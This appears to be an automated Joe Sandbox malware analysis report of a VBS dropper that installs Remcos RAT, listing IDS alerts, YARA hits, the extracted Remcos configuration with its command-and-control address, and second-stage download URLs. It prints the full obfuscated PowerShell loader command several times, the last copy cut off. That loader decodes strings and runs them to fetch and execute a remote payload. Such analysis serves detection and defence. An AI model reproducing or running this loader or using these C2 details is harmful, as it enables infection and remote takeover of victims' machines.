              2024-12-17T08:31:28.343680+010020365941Malware Command and Control Activity Detected192.168.2.949925154.216.18.2162404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T08:30:17.833317+010028032702Potentially Bad Traffic192.168.2.949815172.67.210.11443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: Sublabially.vbsVirustotal: Detection: 11%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49815 version: TLS 1.2
              Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1341689491.00000223AF8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344430785.00000223AFAE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007407000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49826 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49877 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49925 -> 154.216.18.216:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49973 -> 154.216.18.216:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 154.216.18.216
              Source: global trafficTCP traffic: 192.168.2.9:49826 -> 154.216.18.216:2404
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49815 -> 172.67.210.11:443
              Source: global trafficHTTP traffic detected: GET /ZtySvRyz/Blusterer.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.216
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ZtySvRyz/Blusterer.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ig2c.icuCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: ig2c.icu
              Source: powershell.exe, 00000002.00000002.1503719868.0000024856CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000005.00000002.1741174353.0000000007202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftz
              Source: powershell.exe, 00000002.00000002.1504759097.000002485A4EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ig2c.icu
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1504759097.0000024859440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1504759097.000002485A494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ig2c.icu
              Source: msiexec.exe, 00000007.00000002.2649817843.0000000006C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ig2c.icu/
              Source: msiexec.exe, 00000007.00000002.2650095336.0000000006DD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2649817843.0000000006C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.bin
              Source: powershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ig2c.icu/ZtySvRyz/Blusterer.deployP
              Source: powershell.exe, 00000005.00000002.1714950022.0000000004A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ig2c.icu/ZtySvRyz/Blusterer.deployXRml
              Source: powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownHTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.210.11:443 -> 192.168.2.9:49815 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7824.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Potential malicious VBS script found (suspicious strings)
              Source: Initial file: Call Corrosived.ShellExecute( "p" + Dagbgers,Deklamationsnumre & Jordbrugeres & Deklamationsnumre ,"","",0)
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D0AB262_2_00007FF886D0AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886D0B8D22_2_00007FF886D0B8D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0474E6A85_2_0474E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0474EF785_2_0474EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0474E3605_2_0474E360
              Source: Sublabially.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6078
              Source: unknownProcess created: Commandline size = 6078
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6078Jump to behavior
              Source: amsi32_7824.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@8/7@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\misinforms.NonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d234i1w2.fk3.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7536
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7824
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Sublabially.vbsVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi 